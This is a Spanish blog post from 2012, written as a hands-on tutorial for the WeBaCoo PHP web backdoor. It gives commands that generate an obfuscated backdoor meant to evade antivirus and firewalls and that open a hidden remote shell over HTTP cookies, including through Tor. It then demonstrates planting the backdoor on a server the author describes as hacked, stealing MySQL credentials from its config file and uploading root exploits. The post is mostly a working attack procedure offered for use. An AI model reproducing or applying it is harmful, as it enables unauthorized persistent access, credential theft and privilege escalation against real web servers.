jueves, 30 de agosto de 2012

Backdorizando Servidores Web con WeBaCoo



WeBaCoo (Web Backdoor Cookie)  es un backdoor web script-kit que proporciona una terminal de  conexión a través de HTTP entre el cliente y el servidor web. Se trata de una herramienta de explotación para mantener el acceso a un servidor web (hacked).

WeBaCoo fue diseñado para operar bajo el radar de la moderna puesta al anticuado AV, NIDS, IPS, Network Firewalls y Application Firewalls, lo que demuestra un mecanismo de sigilo para ejecutar comandos en el servidor comprometido. El archivo ofuscado realiza comunicación mediante HTTP header's Cookie validando solicitudes y respuestas HTTP del servidor web.

WeBaCoo ofrece un modo de generar el código para crear el PHP backdoor, usando payloads predefinidos. También ofrece la "terminal" el modo en que el usuario puede establecer una remota  conexión con el servidor y ejecutar comandos con privilegios deseados del servicio web.

En muchos casos, esta herramienta es muy usada cuando un servidor no tiene instalado el Netcat.


INSTALACIÓN:
  • git clone git://github.com/anestisb/WeBaCoo.git
  • wget http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz
  • ./webacoo.pl -h

COMANDOS:

1) Crear backdoor ofuscado 'backdoor.php' con la configuración predeterminada:
  • ./webacoo.pl -g -o backdoor.php
2) Crear 'raw-backdoor.php' backdoor des-ofuscado usando la funciona "transito":
  • ./webacoo.pl -g -o raw-backdoor.php -f 4 -r
3) Establecer "terminal" conexión con el host remoto usando la configuración por defecto:
  • ./webacoo.pl -t -u http://127.0.0.1/backdoor.php
4) Establecer "terminal" conexión con el host remoto al configurar algunos argumentos:
  • ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"
5) Establecer "terminal" conexión con el host remoto a través de proxy HTTP:
  • ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080
6) Establecer "terminal" conexión con el host remoto a través de HTTP proxy con autenticación básica:
  • ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128
7) Establecer "terminal" conexión con el host remoto a través de Tor y registrar la actividad:
  • ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt

Ahora bien, teniendo la herramienta instalada y conociendo los comandos, procederemos a crear el backdoor para obtener conexión con el servidor web desde la consola. 

Para este caso he obtenido un servidor cualquiera (hacked) donde subiré el backdoor que creare con el siguiente comando:

  • ./webacoo.pl -g -o backdoor.php
           
El backdoor.php se crea y ubica en la carpeta de los archivos (WeBaCoo), entonces subiremos dicho archivo al servidor (hacked) y procederemos a conectarnos al servidor con el siguiente comando:

  • ./webacoo.pl -t -u http://www.sitio-web.com/backdoor.php

La conexión hacia el servidor es perfecta, por lo que obtendremos la conexión muy rapida.

Comandos Simples:


En este caso colocaremos "load" para ver los comandos con los que manejaremos todo el servidor, las cuales son los siguientes:

1) MySQL-CLI: MySQL Command Line Module:
  • mysql-cli <IP(:port)> <user> <pass>      (ex. 'mysql-cli 10.0.1.11 admin pAsS')
2) PSQL-CLI: Postgres Command Line Module:
  • psql-cli <IP(:port)> <db> <user> <pass>  (ex. 'psql-cli 10.0.1.12 testDB root pAsS')
3) Upload: File Upload Module:
  • upload <local_file> <remote_dir>         (ex. 'upload exploit.c /tmp/')
4) Download: File Download Module:
  • download <remote_file>                   (ex. 'download config.php')
5) Stealth: Enhance Stealth Module
  • stealth <webroot_dir>                 (ex. 'stealth /var/www/html')


Estos comandos son fáciles de usar, haré una breve demostración con el comando MySQL-CLI para obtener y conectarme a la db del servidor.

1) Descargamos el archivo de configuración:
  • download configuration.php 


2) Abrimos el archivo configuration.php copiar el user y password del MySQL, tecleamos el comando:
  • mysql-cli 127.0.0.1:3306 db_user db_password

3) La tool conectara al MySQL, solo nos queda teclear show databases; para apreciar toda la DB.


De igual forma utilizaremos los demás comandos para subir un local root exploit o descargar cualquier archivo del servidor.

Ahora con esta herramienta ya no es necesario que un servidor web tenga el Netcat o hacer un BackConnection que muchas veces no funciona, para conectarse a un servidor web.

Espero les sirva.

Saludos.

No hay comentarios:

Publicar un comentario en la entrada